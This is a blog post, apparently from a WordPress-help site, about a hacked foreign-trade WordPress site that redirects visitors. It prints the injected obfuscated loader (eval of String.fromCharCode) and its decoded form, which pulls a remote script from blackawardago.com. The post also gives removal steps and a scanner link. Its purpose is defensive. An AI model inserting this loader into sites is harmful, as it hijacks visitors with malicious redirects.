Home Experience & Tips Sharing Standard Post

Standard Post

Share a Case of a Foreign Trade WordPress Website Being Hacked with Malicious Redirects

Yesterday, I saw a site owner in a group asking why his WordPress site automatically redirects to someone else's site when opened. Naiba visited the URL he sent privately and took a look. WordPress infected with malicious redirect code: When you open your own site, after most of the content loads, it automatically redirects to a third-party site, and it may redirect through several sites...

Updated on June 15, 2021 About 8 minutes read
分享一个外贸WordPress网站被挂马恶意跳转的案例

Yesterday in a group, I saw a webmaster asking about WordPressbuilt websitethat automatically redirects to someone else's site as soon as it's opened. Then Naiba visited the URL he privately messaged to take a look.

WordPress infected with malicious redirect code

When you open your own site, after most of the content loads, it automatically redirects to a third-party site, and it may redirect through several sites.

At the same time, the redirected site asks for notification permissions, as shown below:

Chrome通知权限

Then I analyzed the site's source code (it had many plugins installed, resulting in a lot of messy JS and other code).

Eventually, I found the following code snippet suspicious. I asked the site owner, and it wasn't his own code nor from any of his installed plugins.

<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

Then Naiba searched for this eval(String.fromCharCode and found the following record article

Record – Site HACKED!

Then viajdstiles.comThis website explains the meaning of the code above.

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Parsing the numbers above again reveals the following website.

https://blackawardago.com

Regardless of the final URL, it's clear the site has been hacked.

This is known as WordPress malicious redirect code abroad, and it seems to have become popular since 2018. Below are two articles Naiba found while searching for information.

https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware

https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net

If you want to check if your website is also infected with this malicious redirect code, you can use the following website to inspect it.

https://sitecheck.sucuri.net/

WordPress Malicious Redirect Code Removal Methods

Of course, if infected with WordPress malicious redirect code, how can it be removed? (Since that site owner didn't ask for my help, Naiba hasn't encountered the actual code. Below are general handling methods shared.)

Solution for those who can understand code

  1. Find the malicious code and delete it.
  2. Check all website files and code to see if there are any other infections or unknown scripts, and delete them.
  3. Check if the database is infected; if so, delete the infected content.

Solution for those who cannot understand code

  1. Pay someone who understands code to clean it for you. I saw the foreign service above starts at $108/year.
  2. Delete the website and reinstall it, ensuring the use of secure themes and plugins, ensuring the database is not infected, and ensuring server security.

If any experts reading this article know how to clean such malicious code or have experience cleaning malicious code, please leave a comment to share.

Finally, recommend a plugin:Install a firewall for WordPress! Try Wordfence

Related knowledge:Implement Security Measures to Avoid WordPress Websites Being Hacked

1/5 - (1 vote)
Previous Baota Panel: Methods for Installing Extensions like Memcached and ionCube Continue reading content around the same timeline. Next Baota Panel Management Commands Solution for Forgetting Baota Panel Password View the next related tutorial or experience.

AI Website Building Assistant

🤖
Hello! I am the Naibabiji AI Assistant. How can I help you?
Quick Consultation: